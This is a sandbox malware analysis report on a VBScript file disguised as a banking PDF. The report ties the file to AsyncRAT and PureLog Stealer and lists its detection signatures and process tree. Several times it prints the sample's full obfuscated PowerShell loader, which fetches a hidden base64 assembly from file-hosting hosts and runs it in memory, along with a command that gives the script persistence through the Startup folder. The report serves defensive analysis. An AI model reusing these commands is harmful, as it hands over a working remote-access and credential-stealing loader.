Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LETA_pdf.vbs

Overview

General Information

Sample name:LETA_pdf.vbs
renamed because original name is a hash value
Original sample name:DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919848ca5848919848484911555458_INFORMACION_COMPLETA_pdf.vbs
Analysis ID:1559694
MD5:8825e4591cadaec1fb1d0082f84c2398
SHA1:39fca0a522686f7b9b2b9dc5e5874aebcf231159
SHA256:61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
Infos:

Detection

AsyncRAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected VBS Downloader Generic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2732 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 4928 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1776 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 1136 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • InstallUtil.exe (PID: 6284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
No configs have been found
SourceRuleDescriptionAuthorStrings
LETA_pdf.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          Process Memory Space: powershell.exe PID: 5100INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x8c2da:$b2: ::FromBase64String(
          • 0xe1504:$b2: ::FromBase64String(
          • 0xe1b29:$b2: ::FromBase64String(
          • 0xe30bc:$b2: ::FromBase64String(
          • 0xe37a6:$b2: ::FromBase64String(
          • 0xe3fb2:$b2: ::FromBase64String(
          • 0xe4655:$b2: ::FromBase64String(
          • 0x1a171:$b3: ::UTF8.GetString(
          • 0x1aa97:$b3: ::UTF8.GetString(
          • 0x21a20:$b3: ::UTF8.GetString(
          • 0x2234f:$b3: ::UTF8.GetString(
          • 0x4204d:$b3: ::UTF8.GetString(
          • 0x4297c:$b3: ::UTF8.GetString(
          • 0x4348a:$b3: ::UTF8.GetString(
          • 0x48793:$b3: ::UTF8.GetString(
          • 0x4b630:$b3: ::UTF8.GetString(
          • 0x4bf56:$b3: ::UTF8.GetString(
          • 0x4da9b:$b3: ::UTF8.GetString(
          • 0x4e46c:$b3: ::UTF8.GetString(
          • 0x4ed9b:$b3: ::UTF8.GetString(
          • 0x692fa:$b3: ::UTF8.GetString(
          Process Memory Space: powershell.exe PID: 3960JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            13.2.InstallUtil.exe.400000.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              13.2.InstallUtil.exe.400000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                13.2.InstallUtil.exe.406d60.0.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  13.2.InstallUtil.exe.406d60.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    SourceRuleDescriptionAuthorStrings
                    amsi64_3960.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_3960.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VC
                        Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhR
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhR
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, 